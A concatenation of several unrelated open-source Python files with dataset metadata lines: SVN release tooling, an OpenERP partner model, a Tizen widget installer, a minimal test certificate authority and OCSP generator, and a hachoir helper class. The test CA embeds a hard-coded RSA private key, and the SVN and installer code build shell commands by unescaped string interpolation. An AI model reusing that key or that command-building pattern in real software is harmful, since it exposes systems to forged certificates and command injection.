if self.svnPass and isHTTPS:
args.append( "--password '%s'" % self.svnPass )
return ( " ".join( args ), devRoot )
def doLS( self, path ):
destT = self.__getDevCmdBase( path )
cmd = "svn ls %s %s" % destT
return self.executeCommand( cmd, True )
def __cmdImport( self, origin, dest, comment ):
destT = self.__getDevCmdBase( dest )
cmd = "svn import -m '%s' %s '%s' '%s'" % ( comment, destT[0], origin, destT[1] )
return cmd
def queueImport( self, origin, dest, comment ):
self.addCommandToQueue( self.__cmdImport( origin, dest, comment ) )
def doImport( self, origin, dest, comment ):
return self.executeCommand( self.__cmdImport( origin, dest, comment ), False )
def __cmdCopy( self, origin, dest, comment ):
destT = self.__getDevCmdBase( dest )
orT = self.__getDevCmdBase( origin )
cmd = "svn copy -m '%s' %s '%s' '%s'" % ( comment, destT[0], orT[1], destT[1] )
return cmd
def queueCopy( self, origin, dest, comment ):
self.addCommandToQueue( self.__cmdCopy( origin, dest, comment ) )
def __cmdMultiCopy( self, originList, dest, comment ):
orList = [ "'%s'" % self.__getDevCmdBase( orPath )[1] for orPath in originList ]
destT = self.__getDevCmdBase( dest )
cmd = "svn copy -m '%s' %s %s '%s'" % ( comment, destT[0], " ".join( orList ), destT[1] )
return cmd
def queueMultiCopy( self, originList, dest, comment ):
self.addCommandToQueue( self.__cmdMultiCopy( originList, dest, comment ) )
# def doCopy( self, path, comment ):
# return self.executeCommand( self.__cmdCopy( origin, dest, comment ), False )
def __cmdMakeDir( self, path, comment ):
destT = self.__getDevCmdBase( path )
return "svn mkdir --parents -m '%s' %s %s" % ( comment, destT[0], destT[1] )
def queueMakeDir( self, path, comment ):
self.addCommandToQueue( self.__cmdMakeDir( path, comment ) )
def doMakeDir( self, path, comment ):
return self.executeCommand( self.__cmdMakeDir( path, comment ), False )
def doCheckout( self, path, location ):
destT = self.__getDevCmdBase( path )
cmd = "svn co %s '%s' '%s'" % ( destT[0], destT[1], location )
return self.executeCommand( cmd, False )
def doCommit( self, location, comment ):
destT = self.__getDevCmdBase( "" )
cmd = "svn ci -m '%s' %s '%s'" % ( comment, destT[0], location )
return self.executeCommand( cmd, False )
#Get copy revision
def getCopyRevision( self, location ):
destT = self.__getDevCmdBase( location )
cmd = "svn log --stop-on-copy %s '%s'" % ( destT[0], destT[1] )
exitCode, outData = self.executeCommand( cmd )
if exitCode:
return 0
copyRev = 0
revRE = re.compile( "r([0-9]+)\s*\|\s*(\w+).*" )
for line in List.fromChar( outData, "\n" ):
reM = revRE.match( line )
if reM:
copyRev = reM.groups()[0]
return copyRev
#
def writeVersionToTmpInit( self, version ):
verTup = parseVersionString( version )
if not verTup:
return False
destT = self.__getDevCmdBase( "%s/trunk/%s/__init__.py" % ( self.package, self.package ) )
cmd = "svn cat %s '%s'" % ( destT[0], destT[1] )
exitCode, outData = self.executeCommand( cmd )
if exitCode:
return False
tmpfd, tmpname = tempfile.mkstemp()
versionStrings = ( "majorVersion", "minorVersion", "patchLevel", "preVersion" )
reList = []
for iP in range( len( versionStrings ) ):
if verTup[iP]:
replStr = "%s = %s" % ( versionStrings[iP], verTup[iP] )
else:
replStr = "%s = 0" % versionStrings[iP]
reList.append( ( re.compile( "^(%s\s*=)\s*[0-9]+\s*" % versionStrings[iP] ), replStr ) )
for line in outData.split( "\n" ):
for reCm, replStr in reList:
line = reCm.sub( replStr, line )
os.write( tmpfd, "%s\n" % line )
os.close( tmpfd )
return tmpname
#End of Distribution class
gVersionRE = re.compile( "v([0-9]+)(?:r([0-9]+))?(?:p([0-9]+))?(?:-pre([0-9]+))?" )
def parseVersionString( version ):
result = gVersionRE.match( version.strip() )
if not result:
return False
vN = []
for e in result.groups():
if e:
vN.append( int( e ) )
else:
vN.append( None )
return tuple( vN )
def writeVersionToInit( rootPath, version ):
verTup = parseVersionString( version )
if not verTup:
return S_OK()
initFile = os.path.join( rootPath, "__init__.py" )
if not os.path.isfile( initFile ):
return S_OK()
try:
fd = open( initFile, "r" )
fileData = fd.read()
fd.close()
except Exception, e:
return S_ERROR( "Could not open %s: %s" % ( initFile, str( e ) ) )
versionStrings = ( "majorVersion", "minorVersion", "patchLevel", "preVersion" )
reList = []
for iP in range( len( versionStrings ) ):
if verTup[iP]:
replStr = "%s = %s" % ( versionStrings[iP], verTup[iP] )
else:
replStr = "%s = 0" % versionStrings[iP]
reList.append( ( re.compile( "^(%s\s*=)\s*[0-9]+\s*" % versionStrings[iP] ), replStr ) )
newData = []
for line in fileData.split( "\n" ):
for reCm, replStr in reList:
line = reCm.sub( replStr, line )
newData.append( line )
try:
fd = open( initFile, "w" )
fd.write( "\n".join( newData ) )
fd.close()
except Exception, e:
return S_ERROR( "Could write to %s: %s" % ( initFile, str( e ) ) )
return S_OK()
#
def createTarball( tarballPath, directoryToTar, additionalDirectoriesToTar = None ):
tf = tarfile.open( tarballPath, "w:gz" )
tf.add( directoryToTar, os.path.basename( os.path.abspath( directoryToTar ) ), recursive = True )
if type( additionalDirectoriesToTar ) in ( types.StringType, types.UnicodeType ):
additionalDirectoriesToTar = [ additionalDirectoriesToTar ]
if additionalDirectoriesToTar:
for dirToTar in additionalDirectoriesToTar:
if os.path.isdir( dirToTar ):
tf.add( dirToTar, os.path.basename( os.path.abspath( dirToTar ) ), recursive = True )
tf.close()
md5FilePath = False
for suffix in ( ".tar.gz", ".gz" ):
sLen = len( suffix )
if tarballPath[ len( tarballPath ) - sLen: ] == suffix:
md5FilePath = "%s.md5" % tarballPath[:-sLen]
break
if not md5FilePath:
return S_ERROR( "Could not generate md5 filename" )
md5str = File.getMD5ForFiles( [ tarballPath ] )
fd = open( md5FilePath, "w" )
fd.write( md5str )
fd.close()
return S_OK()
#Start of release notes
gAllowedNoteTypes = ( "NEW", "CHANGE", "BUGFIX", 'FIX' )
gNoteTypeAlias = { 'FIX' : 'BUGFIX' }
def retrieveReleaseNotes( packages ):
if type( packages ) in ( types.StringType, types.UnicodeType ):
packages = [ str( packages ) ]
packageCFGDict = {}
#Get the versions.cfg
for package in packages:
packageCFGDict[ package ] = Distribution( package ).getVersionsCFG()
#Parse the release notes
pkgNotesDict = {}
for package in packageCFGDict:
versionsCFG = packageCFGDict[ package ][ 'Versions' ]
pkgNotesDict[ package ] = []
for mainVersion in versionsCFG.listSections( ordered = True ):
vCFG = versionsCFG[ mainVersion ]
versionNotes = {}
for subsys in vCFG.listOptions():
comment = vCFG.getComment( subsys )
if not comment:
continue
versionNotes[ subsys ] = {}
lines = List.fromChar( comment, "\n" )
lastCommentType = False
for line in lines:
processedLine = False
for typeComment in gAllowedNoteTypes:
if line.find( "%s:" % typeComment ) == 0:
if typeComment in gNoteTypeAlias:
effectiveType = gNoteTypeAlias[ typeComment ]
else:
effectiveType = typeComment
if effectiveType not in versionNotes[ subsys ]:
versionNotes[ subsys ][ effectiveType ] = []
versionNotes[ subsys ][ effectiveType ].append( line[ len( typeComment ) + 1: ].strip() )
lastCommentType = effectiveType
processedLine = True
if not processedLine and lastCommentType:
versionNotes[ subsys ][ effectiveType ][-1] += " %s" % line.strip()
if versionNotes:
pkgNotesDict[ package ].append( { 'version' : mainVersion, 'notes' : versionNotes } )
versionComment = versionsCFG.getComment( mainVersion )
if versionComment:
pkgNotesDict[ package ][-1][ 'comment' ] = "\n".join( [ l.strip() for l in versionComment.split( "\n" ) ] )
return pkgNotesDict
def generateReleaseNotes( packages, destinationPath, versionReleased = "", singleVersion = False ):
if type( packages ) in ( types.StringType, types.UnicodeType ):
packages = [ str( packages ) ]
pkgNotesDict = retrieveReleaseNotes( packages )
fileContents = []
foundStartVersion = versionReleased == ""
for package in packages:
if package not in pkgNotesDict:
continue
#Add a section with the package name
dummy = "Package %s" % package
fileContents.append( "-" * len( dummy ) )
fileContents.append( dummy )
fileContents.append( "-" * len( dummy ) )
vNotesDict = pkgNotesDict[ package ]
for versionNotes in vNotesDict:
if singleVersion and versionReleased and versionNotes[ 'version' ] != versionReleased:
continue
if versionReleased and versionReleased == versionNotes[ 'version' ]:
foundStartVersion = True
#Skip until found initial version
if not foundStartVersion:
continue
dummy = "Version %s" % versionNotes[ 'version' ]
fileContents.append( "" )
fileContents.append( dummy )
fileContents.append( "-" * len( dummy ) )
if 'comment' in versionNotes:
fileContents.extend( [ '', versionNotes[ 'comment' ], '' ] )
for noteType in gAllowedNoteTypes:
notes4Type = []
for system in versionNotes[ 'notes' ]:
if noteType in versionNotes[ 'notes' ][ system ] and versionNotes[ 'notes' ][ system ][ noteType ]:
notes4Type.append( " %s" % system )
for line in versionNotes[ 'notes' ][ system ][ noteType ]:
notes4Type.append( " - %s" % line )
if notes4Type:
fileContents.append( "" )
fileContents.append( "%s" % noteType )
fileContents.append( ":" * len( noteType ) )
fileContents.append( "" )
fileContents.extend( notes4Type )
fd = open( destinationPath, "w" )
fd.write( "%s\n\n" % "\n".join( fileContents ) )
fd.close()
def generateHTMLReleaseNotesFromRST( rstFile, htmlFile ):
try:
import docutils.core
except ImportError:
gLogger.error( "Docutils is not installed, skipping generation of release notes in html format" )
return False
try:
fd = open( rstFile )
rstData = fd.read()
fd.close()
except Exception:
gLogger.error( "Oops! Could not read the rst file :P" )
return False
parts = docutils.core.publish_parts( rstData, writer_name = 'html' )
try:
fd = open( htmlFile, "w" )
fd.write( parts[ 'whole' ] )
fd.close()
except Exception:
gLogger.error( "Oops! Could not write the html file :P" )
return False
return True
| gpl-3.0 | 6,507,806,666,317,573,000 | 35.172414 | 115 | 0.611177 | false |
gurneyalex/vertical-travel | railway_station/res_partner.py | 2 | 1263 | # -*- encoding: utf-8 -*-
#
# OpenERP, Open Source Management Solution
# This module copyright (C) 2013 Savoir-faire Linux
# (<http://www.savoirfairelinux.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from openerp.osv import orm, fields
class res_partner(orm.Model):
"""
Inherits partner and adds airport and iata_code fields in the partner
form
"""
_inherit = 'res.partner'
_columns = {
'railway_station': fields.boolean('Railway Station'),
}
_defaults = {
'railway_station': 0,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | -326,881,288,099,529,500 | 34.083333 | 77 | 0.691211 | false |
JianfengXu/crosswalk-test-suite | webapi/tct-navigationtiming-w3c-tests/inst.wgt.py | 44 | 6786 | #!/usr/bin/env python
import os
import shutil
import glob
import time
import sys
import subprocess
import string
from optparse import OptionParser, make_option
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
PKG_NAME = os.path.basename(SCRIPT_DIR)
PARAMETERS = None
#XW_ENV = "export DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/5000/dbus/user_bus_socket"
SRC_DIR = ""
PKG_SRC_DIR = ""
def doCMD(cmd):
# Do not need handle timeout in this short script, let tool do it
print "-->> \"%s\"" % cmd
output = []
cmd_return_code = 1
cmd_proc = subprocess.Popen(
cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)
while True:
output_line = cmd_proc.stdout.readline().strip("\r\n")
cmd_return_code = cmd_proc.poll()
if output_line == '' and cmd_return_code is not None:
break
sys.stdout.write("%s\n" % output_line)
sys.stdout.flush()
output.append(output_line)
return (cmd_return_code, output)
def updateCMD(cmd=None):
if "pkgcmd" in cmd:
cmd = "su - %s -c '%s;%s'" % (PARAMETERS.user, XW_ENV, cmd)
return cmd
def getUSERID():
if PARAMETERS.mode == "SDB":
cmd = "sdb -s %s shell id -u %s" % (
PARAMETERS.device, PARAMETERS.user)
else:
cmd = "ssh %s \"id -u %s\"" % (
PARAMETERS.device, PARAMETERS.user)
return doCMD(cmd)
def getPKGID(pkg_name=None):
if PARAMETERS.mode == "SDB":
cmd = "sdb -s %s shell %s" % (
PARAMETERS.device, updateCMD('pkgcmd -l'))
else:
cmd = "ssh %s \"%s\"" % (
PARAMETERS.device, updateCMD('pkgcmd -l'))
(return_code, output) = doCMD(cmd)
if return_code != 0:
return None
test_pkg_id = None
for line in output:
if line.find("[" + pkg_name + "]") != -1:
pkgidIndex = line.split().index("pkgid")
test_pkg_id = line.split()[pkgidIndex + 1].strip("[]")
break
return test_pkg_id
def doRemoteCMD(cmd=None):
if PARAMETERS.mode == "SDB":
cmd = "sdb -s %s shell %s" % (PARAMETERS.device, updateCMD(cmd))
else:
cmd = "ssh %s \"%s\"" % (PARAMETERS.device, updateCMD(cmd))
return doCMD(cmd)
def doRemoteCopy(src=None, dest=None):
if PARAMETERS.mode == "SDB":
cmd_prefix = "sdb -s %s push" % PARAMETERS.device
cmd = "%s %s %s" % (cmd_prefix, src, dest)
else:
cmd = "scp -r %s %s:/%s" % (src, PARAMETERS.device, dest)
(return_code, output) = doCMD(cmd)
doRemoteCMD("sync")
if return_code != 0:
return True
else:
return False
def uninstPKGs():
action_status = True
for root, dirs, files in os.walk(SCRIPT_DIR):
for file in files:
if file.endswith(".wgt"):
pkg_id = getPKGID(os.path.basename(os.path.splitext(file)[0]))
if not pkg_id:
action_status = False
continue
(return_code, output) = doRemoteCMD(
"pkgcmd -u -t wgt -q -n %s" % pkg_id)
for line in output:
if "Failure" in line:
action_status = False
break
(return_code, output) = doRemoteCMD(
"rm -rf %s" % PKG_SRC_DIR)
if return_code != 0:
action_status = False
return action_status
def instPKGs():
action_status = True
(return_code, output) = doRemoteCMD(
"mkdir -p %s" % PKG_SRC_DIR)
if return_code != 0:
action_status = False
for root, dirs, files in os.walk(SCRIPT_DIR):
for file in files:
if file.endswith(".wgt"):
if not doRemoteCopy(
os.path.join(root, file), "%s/%s" % (SRC_DIR, file)):
action_status = False
(return_code, output) = doRemoteCMD(
"pkgcmd -i -t wgt -q -p %s/%s" % (SRC_DIR, file))
doRemoteCMD("rm -rf %s/%s" % (SRC_DIR, file))
for line in output:
if "Failure" in line:
action_status = False
break
for item in glob.glob("%s/*" % SCRIPT_DIR):
if item.endswith(".wgt"):
continue
elif item.endswith("inst.py"):
continue
else:
item_name = os.path.basename(item)
if not doRemoteCopy(item, "%s/%s" % (PKG_SRC_DIR, item_name)):
# if not doRemoteCopy(item, PKG_SRC_DIR):
action_status = False
return action_status
def main():
try:
usage = "usage: inst.py -i"
opts_parser = OptionParser(usage=usage)
opts_parser.add_option(
"-m", dest="mode", action="store", help="Specify mode")
opts_parser.add_option(
"-s", dest="device", action="store", help="Specify device")
opts_parser.add_option(
"-i", dest="binstpkg", action="store_true", help="Install package")
opts_parser.add_option(
"-u", dest="buninstpkg", action="store_true", help="Uninstall package")
opts_parser.add_option(
"-a", dest="user", action="store", help="User name")
global PARAMETERS
(PARAMETERS, args) = opts_parser.parse_args()
except Exception as e:
print "Got wrong option: %s, exit ..." % e
sys.exit(1)
if not PARAMETERS.user:
PARAMETERS.user = "app"
global SRC_DIR, PKG_SRC_DIR
SRC_DIR = "/home/%s/content" % PARAMETERS.user
PKG_SRC_DIR = "%s/tct/opt/%s" % (SRC_DIR, PKG_NAME)
if not PARAMETERS.mode:
PARAMETERS.mode = "SDB"
if PARAMETERS.mode == "SDB":
if not PARAMETERS.device:
(return_code, output) = doCMD("sdb devices")
for line in output:
if str.find(line, "\tdevice") != -1:
PARAMETERS.device = line.split("\t")[0]
break
else:
PARAMETERS.mode = "SSH"
if not PARAMETERS.device:
print "No device provided"
sys.exit(1)
user_info = getUSERID()
re_code = user_info[0]
if re_code == 0:
global XW_ENV
userid = user_info[1][0]
XW_ENV = "export DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/%s/dbus/user_bus_socket" % str(
userid)
else:
print "[Error] cmd commands error : %s" % str(user_info[1])
sys.exit(1)
if PARAMETERS.binstpkg and PARAMETERS.buninstpkg:
print "-i and -u are conflict"
sys.exit(1)
if PARAMETERS.buninstpkg:
if not uninstPKGs():
sys.exit(1)
else:
if not instPKGs():
sys.exit(1)
if __name__ == "__main__":
main()
sys.exit(0)
| bsd-3-clause | -3,068,844,990,641,179,600 | 28.763158 | 101 | 0.537872 | false |
hgl888/chromium-crosswalk-efl | net/tools/testserver/minica.py | 78 | 10487 | # Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import asn1
import hashlib
import os
# This file implements very minimal certificate and OCSP generation. It's
# designed to test revocation checking.
def RandomNumber(length_in_bytes):
'''RandomNumber returns a random number of length 8*|length_in_bytes| bits'''
rand = os.urandom(length_in_bytes)
n = 0
for x in rand:
n <<= 8
n |= ord(x)
return n
def ModExp(n, e, p):
'''ModExp returns n^e mod p'''
r = 1
while e != 0:
if e & 1:
r = (r*n) % p
e >>= 1
n = (n*n) % p
return r
# PKCS1v15_SHA256_PREFIX is the ASN.1 prefix for a SHA256 signature.
PKCS1v15_SHA256_PREFIX = '3031300d060960864801650304020105000420'.decode('hex')
class RSA(object):
def __init__(self, modulus, e, d):
self.m = modulus
self.e = e
self.d = d
self.modlen = 0
m = modulus
while m != 0:
self.modlen += 1
m >>= 8
def Sign(self, message):
digest = hashlib.sha256(message).digest()
prefix = PKCS1v15_SHA256_PREFIX
em = ['\xff'] * (self.modlen - 1 - len(prefix) - len(digest))
em[0] = '\x00'
em[1] = '\x01'
em += "\x00" + prefix + digest
n = 0
for x in em:
n <<= 8
n |= ord(x)
s = ModExp(n, self.d, self.m)
out = []
while s != 0:
out.append(s & 0xff)
s >>= 8
out.reverse()
return '\x00' * (self.modlen - len(out)) + asn1.ToBytes(out)
def ToDER(self):
return asn1.ToDER(asn1.SEQUENCE([self.m, self.e]))
def Name(cn = None, c = None, o = None):
names = asn1.SEQUENCE([])
if cn is not None:
names.children.append(
asn1.SET([
asn1.SEQUENCE([
COMMON_NAME, cn,
])
])
)
if c is not None:
names.children.append(
asn1.SET([
asn1.SEQUENCE([
COUNTRY, c,
])
])
)
if o is not None:
names.children.append(
asn1.SET([
asn1.SEQUENCE([
ORGANIZATION, o,
])
])
)
return names
# The private key and root certificate name are hard coded here:
# This is the private key
KEY = RSA(0x00a71998f2930bfe73d031a87f133d2f378eeeeed52a77e44d0fc9ff6f07ff32cbf3da999de4ed65832afcb0807f98787506539d258a0ce3c2c77967653099a9034a9b115a876c39a8c4e4ed4acd0c64095946fb39eeeb47a0704dbb018acf48c3a1c4b895fc409fb4a340a986b1afc45519ab9eca47c30185c771c64aa5ecf07d,
3,
0x6f6665f70cb2a9a28acbc5aa0cd374cfb49f49e371a542de0a86aa4a0554cc87f7e71113edf399021ca875aaffbafaf8aee268c3b15ded2c84fb9a4375bbc6011d841e57833bc6f998d25daf6fa7f166b233e3e54a4bae7a5aaaba21431324967d5ff3e1d4f413827994262115ca54396e7068d0afa7af787a5782bc7040e6d3)
# And the same thing in PEM format
KEY_PEM = '''-----BEGIN RSA PRIVATE KEY-----
MIICXAIBAAKBgQCnGZjykwv+c9AxqH8TPS83ju7u1Sp35E0Pyf9vB/8yy/PamZ3k
7WWDKvywgH+YeHUGU50ligzjwsd5Z2UwmakDSpsRWodsOajE5O1KzQxkCVlG+znu
60egcE27AYrPSMOhxLiV/ECftKNAqYaxr8RVGaueykfDAYXHccZKpezwfQIBAwKB
gG9mZfcMsqmiisvFqgzTdM+0n0njcaVC3gqGqkoFVMyH9+cRE+3zmQIcqHWq/7r6
+K7iaMOxXe0shPuaQ3W7xgEdhB5XgzvG+ZjSXa9vp/FmsjPj5UpLrnpaqrohQxMk
ln1f8+HU9BOCeZQmIRXKVDlucGjQr6eveHpXgrxwQObTAkEA2wBAfuduw5G0/VfN
Wx66D5fbPccfYFqLM5LuTimLmNqzK2gIKXckB2sm44gJZ6wVlumaB1CSNug2LNYx
3cAjUwJBAMNUo1hbI8ugqqwI9kpxv9+2Heea4BlnXbS6tYF8pvkHMoliuxNbXmmB
u4zNB5iZ6V0ZZ4nvtUNo2cGr/h/Lcu8CQQCSACr/RPSCYSNTj948vya1D+d+hL+V
kbIiYfQ0G7Jl5yIc8AVw+hgE8hntBVuacrkPRmaviwwkms7IjsvpKsI3AkEAgjhs
5ZIX3RXHHVtO3EvVP86+mmdAEO+TzdHOVlMZ+1ohsOx8t5I+8QEnszNaZbvw6Lua
W/UjgkXmgR1UFTJMnwJBAKErmAw21/g3SST0a4wlyaGT/MbXL8Ouwnb5IOKQVe55
CZdeVeSh6cJ4hAcQKfr2s1JaZTJFIBPGKAif5HqpydA=
-----END RSA PRIVATE KEY-----
'''
# Root certificate CN
ISSUER_CN = "Testing CA"
# All certificates are issued under this policy OID, in the Google arc:
CERT_POLICY_OID = asn1.OID([1, 3, 6, 1, 4, 1, 11129, 2, 4, 1])
# These result in the following root certificate:
# -----BEGIN CERTIFICATE-----
# MIIB0TCCATqgAwIBAgIBATANBgkqhkiG9w0BAQUFADAVMRMwEQYDVQQDEwpUZXN0aW5nIENBMB4X
# DTEwMDEwMTA2MDAwMFoXDTMyMTIwMTA2MDAwMFowFTETMBEGA1UEAxMKVGVzdGluZyBDQTCBnTAN
# BgkqhkiG9w0BAQEFAAOBiwAwgYcCgYEApxmY8pML/nPQMah/Ez0vN47u7tUqd+RND8n/bwf/Msvz
# 2pmd5O1lgyr8sIB/mHh1BlOdJYoM48LHeWdlMJmpA0qbEVqHbDmoxOTtSs0MZAlZRvs57utHoHBN
# uwGKz0jDocS4lfxAn7SjQKmGsa/EVRmrnspHwwGFx3HGSqXs8H0CAQOjMzAxMBIGA1UdEwEB/wQI
# MAYBAf8CAQAwGwYDVR0gAQEABBEwDzANBgsrBgEEAdZ5AgHODzANBgkqhkiG9w0BAQUFAAOBgQA/
# STb40A6D+93jMfLGQzXc997IsaJZdoPt7tYa8PqGJBL62EiTj+erd/H5pDZx/2/bcpOG4m9J56yg
# wOohbllw2TM+oeEd8syzV6X+1SIPnGI56JRrm3UXcHYx1Rq5loM9WKAiz/WmIWmskljsEQ7+542p
# q0pkHjs8nuXovSkUYA==
# -----END CERTIFICATE-----
# If you update any of the above, you can generate a new root with the
# following line:
# print DERToPEM(MakeCertificate(ISSUER_CN, ISSUER_CN, 1, KEY, KEY, None))
# Various OIDs
AIA_OCSP = asn1.OID([1, 3, 6, 1, 5, 5, 7, 48, 1])
AUTHORITY_INFORMATION_ACCESS = asn1.OID([1, 3, 6, 1, 5, 5, 7, 1, 1])
BASIC_CONSTRAINTS = asn1.OID([2, 5, 29, 19])
CERT_POLICIES = asn1.OID([2, 5, 29, 32])
COMMON_NAME = asn1.OID([2, 5, 4, 3])
COUNTRY = asn1.OID([2, 5, 4, 6])
HASH_SHA1 = asn1.OID([1, 3, 14, 3, 2, 26])
OCSP_TYPE_BASIC = asn1.OID([1, 3, 6, 1, 5, 5, 7, 48, 1, 1])
ORGANIZATION = asn1.OID([2, 5, 4, 10])
PUBLIC_KEY_RSA = asn1.OID([1, 2, 840, 113549, 1, 1, 1])
SHA256_WITH_RSA_ENCRYPTION = asn1.OID([1, 2, 840, 113549, 1, 1, 11])
def MakeCertificate(
issuer_cn, subject_cn, serial, pubkey, privkey, ocsp_url = None):
'''MakeCertificate returns a DER encoded certificate, signed by privkey.'''
extensions = asn1.SEQUENCE([])
# Default subject name fields
c = "XX"
o = "Testing Org"
if issuer_cn == subject_cn:
# Root certificate.
c = None
o = None
extensions.children.append(
asn1.SEQUENCE([
basic_constraints,
True,
asn1.OCTETSTRING(asn1.ToDER(asn1.SEQUENCE([
True, # IsCA
0, # Path len
]))),
]))
if ocsp_url is not None:
extensions.children.append(
asn1.SEQUENCE([
AUTHORITY_INFORMATION_ACCESS,
False,
asn1.OCTETSTRING(asn1.ToDER(asn1.SEQUENCE([
asn1.SEQUENCE([
AIA_OCSP,
asn1.Raw(asn1.TagAndLength(0x86, len(ocsp_url)) + ocsp_url),
]),
]))),
]))
extensions.children.append(
asn1.SEQUENCE([
CERT_POLICIES,
False,
asn1.OCTETSTRING(asn1.ToDER(asn1.SEQUENCE([
asn1.SEQUENCE([ # PolicyInformation
CERT_POLICY_OID,
]),
]))),
])
)
tbsCert = asn1.ToDER(asn1.SEQUENCE([
asn1.Explicit(0, 2), # Version
serial,
asn1.SEQUENCE([SHA256_WITH_RSA_ENCRYPTION, None]), # SignatureAlgorithm
Name(cn = issuer_cn), # Issuer
asn1.SEQUENCE([ # Validity
asn1.UTCTime("100101060000Z"), # NotBefore
asn1.UTCTime("321201060000Z"), # NotAfter
]),
Name(cn = subject_cn, c = c, o = o), # Subject
asn1.SEQUENCE([ # SubjectPublicKeyInfo
asn1.SEQUENCE([ # Algorithm
PUBLIC_KEY_RSA,
None,
]),
asn1.BitString(asn1.ToDER(pubkey)),
]),
asn1.Explicit(3, extensions),
]))
return asn1.ToDER(asn1.SEQUENCE([
asn1.Raw(tbsCert),
asn1.SEQUENCE([
SHA256_WITH_RSA_ENCRYPTION,
None,
]),
asn1.BitString(privkey.Sign(tbsCert)),
]))
def MakeOCSPResponse(issuer_cn, issuer_key, serial, ocsp_state):
# https://tools.ietf.org/html/rfc2560
issuer_name_hash = asn1.OCTETSTRING(
hashlib.sha1(asn1.ToDER(Name(cn = issuer_cn))).digest())
issuer_key_hash = asn1.OCTETSTRING(
hashlib.sha1(asn1.ToDER(issuer_key)).digest())
cert_status = None
if ocsp_state == OCSP_STATE_REVOKED:
cert_status = asn1.Explicit(1, asn1.GeneralizedTime("20100101060000Z"))
elif ocsp_state == OCSP_STATE_UNKNOWN:
cert_status = asn1.Raw(asn1.TagAndLength(0x80 | 2, 0))
elif ocsp_state == OCSP_STATE_GOOD:
cert_status = asn1.Raw(asn1.TagAndLength(0x80 | 0, 0))
else:
raise ValueError('Bad OCSP state: ' + str(ocsp_state))
basic_resp_data_der = asn1.ToDER(asn1.SEQUENCE([
asn1.Explicit(2, issuer_key_hash),
asn1.GeneralizedTime("20100101060000Z"), # producedAt
asn1.SEQUENCE([
asn1.SEQUENCE([ # SingleResponse
asn1.SEQUENCE([ # CertID
asn1.SEQUENCE([ # hashAlgorithm
HASH_SHA1,
None,
]),
issuer_name_hash,
issuer_key_hash,
serial,
]),
cert_status,
asn1.GeneralizedTime("20100101060000Z"), # thisUpdate
asn1.Explicit(0, asn1.GeneralizedTime("20300101060000Z")), # nextUpdate
]),
]),
]))
basic_resp = asn1.SEQUENCE([
asn1.Raw(basic_resp_data_der),
asn1.SEQUENCE([
SHA256_WITH_RSA_ENCRYPTION,
None,
]),
asn1.BitString(issuer_key.Sign(basic_resp_data_der)),
])
resp = asn1.SEQUENCE([
asn1.ENUMERATED(0),
asn1.Explicit(0, asn1.SEQUENCE([
OCSP_TYPE_BASIC,
asn1.OCTETSTRING(asn1.ToDER(basic_resp)),
]))
])
return asn1.ToDER(resp)
def DERToPEM(der):
pem = '-----BEGIN CERTIFICATE-----\n'
pem += der.encode('base64')
pem += '-----END CERTIFICATE-----\n'
return pem
OCSP_STATE_GOOD = 1
OCSP_STATE_REVOKED = 2
OCSP_STATE_INVALID = 3
OCSP_STATE_UNAUTHORIZED = 4
OCSP_STATE_UNKNOWN = 5
# unauthorizedDER is an OCSPResponse with a status of 6:
# SEQUENCE { ENUM(6) }
unauthorizedDER = '30030a0106'.decode('hex')
def GenerateCertKeyAndOCSP(subject = "127.0.0.1",
ocsp_url = "http://127.0.0.1",
ocsp_state = OCSP_STATE_GOOD,
serial = 0):
'''GenerateCertKeyAndOCSP returns a (cert_and_key_pem, ocsp_der) where:
* cert_and_key_pem contains a certificate and private key in PEM format
with the given subject common name and OCSP URL.
* ocsp_der contains a DER encoded OCSP response or None if ocsp_url is
None'''
if serial == 0:
serial = RandomNumber(16)
cert_der = MakeCertificate(ISSUER_CN, bytes(subject), serial, KEY, KEY,
bytes(ocsp_url))
cert_pem = DERToPEM(cert_der)
ocsp_der = None
if ocsp_url is not None:
if ocsp_state == OCSP_STATE_UNAUTHORIZED:
ocsp_der = unauthorizedDER
elif ocsp_state == OCSP_STATE_INVALID:
ocsp_der = '3'
else:
ocsp_der = MakeOCSPResponse(ISSUER_CN, KEY, serial, ocsp_state)
return (cert_pem + KEY_PEM, ocsp_der)
| bsd-3-clause | 4,328,828,044,025,451,000 | 29.048711 | 271 | 0.663488 | false |
hernandito/SickRage | lib/hachoir_core/field/fake_array.py | 95 | 2294 | import itertools
from hachoir_core.field import MissingField
class FakeArray:
"""
Simulate an array for GenericFieldSet.array(): fielset.array("item")[0] is
equivalent to fielset.array("item[0]").
It's possible to iterate over the items using::
for element in fieldset.array("item"):
...
And to get array size using len(fieldset.array("item")).
"""
def __init__(self, fieldset, name):
pos = name.rfind("/")
if pos != -1:
self.fieldset = fieldset[name[:pos]]
self.name = name[pos+1:]
else:
self.fieldset = fieldset
self.name = name
self._format = "%s[%%u]" % self.name
self._cache = {}
self._known_size = False
self._max_index = -1
def __nonzero__(self):
"Is the array empty or not?"
if self._cache:
return True
else:
return (0 in self)
def __len__(self):
"Number of fields in the array"
total = self._max_index+1
if not self._known_size:
for index in itertools.count(total):
try:
field = self[index]
total += 1
except MissingField:
break
return total
def __contains__(self, index):
try:
field = self[index]
return True
except MissingField:
return False
def __getitem__(self, index):
"""
Get a field of the array. Returns a field, or raise MissingField
exception if the field doesn't exist.
"""
try:
value = self._cache[index]
except KeyError:
try:
value = self.fieldset[self._format % index]
except MissingField:
self._known_size = True
raise
self._cache[index] = value
self._max_index = max(index, self._max_index)
return value
def __iter__(self):
"""
Iterate in the fields in their index order: field[0], field[1], ...
"""
for index in itertools.count(0):
try:
yield self[index]
except MissingField:
raise StopIteration()
